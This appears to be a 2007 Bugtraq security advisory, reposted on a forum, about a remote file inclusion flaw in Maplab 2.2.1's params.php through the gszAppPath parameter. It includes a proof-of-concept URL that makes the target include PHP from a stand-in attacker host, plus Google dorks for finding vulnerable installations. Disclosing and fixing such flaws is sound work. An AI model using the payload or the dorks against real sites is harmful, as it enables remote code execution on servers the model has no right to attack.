Maplab <= 2.2.1 (gszAppPath) Remote File Inclusion Vulnerability

看板Bugtraq作者時間19年前 (2007/04/03 01:16), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
----------------------------------------------------------------------------------------- Maplab <= 2.2.1 (gszAppPath) Remote File Inclusion Vulnerability ----------------------------------------------------------------------------------------- Author : Mufti Rizal a.k.a mbahngarso Date : March, 30th 2007 Location : Jakarta, Indonesia Web : http://acak2an.blogspot.com Critical Lvl : Dangerous Impact : System access Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Maplab version : 2.2.1 Vendor : http://maptools.org Description : A suite of web-based tools that simplifies the creation and management of MapServer maps and Web mapping applications --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~ - Invalid include function at gmapfactory/params.php : /* =========================gmapfactory/params.php========================== * Re-build the phtml file * ========================================================================= */ include_once($gszAppPath."htdocs/gmapfactory/build_phtml.php"); .... ---------------------------------------------------------------- Input passed to the "gszAppPath" parameter in params.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources. Poc/Exploit: ~~~~~~~~~ http://www.target.com/[maplab_path]/maplab/htdocs/gmapfactory/params.php?gszAppPath=http://attacker.com/setan? google d0rk: ~~~~~~~ "allinurl:/gmapfactory" or "allinurl:/maplab" Solution: ~~~~~~ - Edit the source code to ensure that input is properly verified. - Turn off register_globals --------------------------------------------------------------------------- Shoutz: ~~~~ ~ K-159, the_day, etc ~ Underground Community. --------------------------------------------------------------------------- Contact: ~~~~~ mbahngarso || mufti.rizal@gmail.com Homepage : http://acak2an.blogspot.com -------------------------------- [ EOF ] ----------------------------------
文章代碼(AID): #164Jfp00 (Bugtraq)